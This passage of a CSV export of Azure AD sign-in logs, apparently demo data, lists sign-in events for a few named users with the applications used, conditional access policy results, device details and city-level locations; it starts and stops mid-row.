Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c95450b3-582d-4306-9dd2-9bda845b1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2042,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3cef09b1100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5f11d930-41ca-43a7-b362-f3cef09b1100,SigninLogs,Sucess,33.0175209,35.44601059
+2043,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,02693ad3-6a51-403c-8b07-1bff079ace0e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",89223cb6-60af-4a3e-b2e1-947086ac1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947086ac1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2044,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:43.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,be394d8f-b895-4faa-8ee7-0fa8d1c37646,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",89223cb6-60af-4a3e-b2e1-947033ad1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,89223cb6-60af-4a3e-b2e1-947033ad1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2045,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:30.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,d35a04a6-36b3-4e15-8e78-455c3af1dad9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9303d935-cf24-489a-bd00-a11c5c201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c5c201200,SigninLogs,Failed,33.7984581,-84.38828278
+2046,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,82d590aa-acf6-4677-b982-98f9eb0be9c0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",706e1892-a48a-4a34-be7e-8777edbc1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,706e1892-a48a-4a34-be7e-8777edbc1000,SigninLogs,Sucess,33.7984581,-84.38828278
+2047,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,adf76c3e-7a0d-4cea-8334-5d67861c5222,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3ce86b51100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5f11d930-41ca-43a7-b362-f3ce86b51100,SigninLogs,Sucess,41.90428925,-85.99833679
+2048,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eac8469f-40ac-0000-5683-47af378b51c7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",89223cb6-60af-4a3e-b2e1-94705eb41100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-94705eb41100,SigninLogs,Sucess,33.7984581,-84.38828278
+2049,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21f79b95-2592-4421-a14c-c99e880e3239,Microsoft.aadiam,Microsoft.aadiam,,Sarah Fender,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:19,"{'operatingSystem': 'Windows 10', 'deviceId': '553dab9a-8dff-4556-9a90-b8ffee6d8301', 'browser': 'Edge 18.1836', 'displayName': 'SFENDER-SP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",aef039e4-f9d5-4801-81b4-fd2696d91300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.4918212890625, 'latitude': 